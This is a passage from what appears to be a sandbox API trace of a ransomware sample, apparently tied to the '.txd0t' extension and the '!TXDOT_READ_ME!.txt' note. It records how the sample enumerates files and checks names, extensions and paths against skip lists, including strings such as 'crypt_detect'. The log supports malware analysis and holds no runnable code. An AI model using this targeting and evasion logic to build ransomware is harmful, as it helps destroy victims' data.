[0071.555] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.555] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0071.555] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0071.555] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0071.555] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.555] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.555] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.555] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.555] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.555] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.555] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.556] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.556] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.556] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.556] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.556] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.556] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.556] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.556] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0071.556] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0071.556] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" [0071.556] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.556] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.556] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.556] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.556] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.556] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.556] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0071.556] GetProcessHeap () returned 0xe30000 [0071.557] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.557] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0071.557] StrCmpW (psz1="1055", psz2=".") returned 1 [0071.557] StrCmpW (psz1="1055", psz2="..") returned 1 [0071.557] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.557] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.557] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1055", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system32\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\local\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\boot\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\perflogs\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\programdata\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\drivers\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\wsus\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="crypt_detect") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="cryptolocker") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="ransomware") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\WINDOWS") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.557] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files") returned 0x0 [0071.557] GetProcessHeap () returned 0xe30000 [0071.557] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.557] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0071.558] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\*") returned="C:\\588bce7c90097ed212\\1055\\*" [0071.558] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0071.558] StrCmpW (psz1=".", psz2=".") returned 0 [0071.558] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.558] StrCmpW (psz1="..", psz2=".") returned 1 [0071.558] StrCmpW (psz1="..", psz2="..") returned 0 [0071.558] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.558] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.558] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.558] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0071.558] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0071.558] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="C:\\588bce7c90097ed212\\1055\\eula.rtf" [0071.559] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.559] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.559] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.559] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.559] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.559] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.559] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.559] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.559] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.559] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.559] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.559] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.559] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.559] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.559] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0071.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0071.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0071.559] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.559] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.559] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.560] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.560] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.560] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.560] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.560] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.560] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.560] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.560] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.560] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.560] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.560] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.560] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.560] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0071.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0071.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" [0071.560] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.560] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.560] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.560] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.560] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.560] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.560] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.561] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.561] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.561] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.561] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.561] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0071.561] GetProcessHeap () returned 0xe30000 [0071.561] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.561] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0071.561] StrCmpW (psz1="2052", psz2=".") returned 1 [0071.561] StrCmpW (psz1="2052", psz2="..") returned 1 [0071.561] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2052", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system32\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\local\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.561] StrStrIW 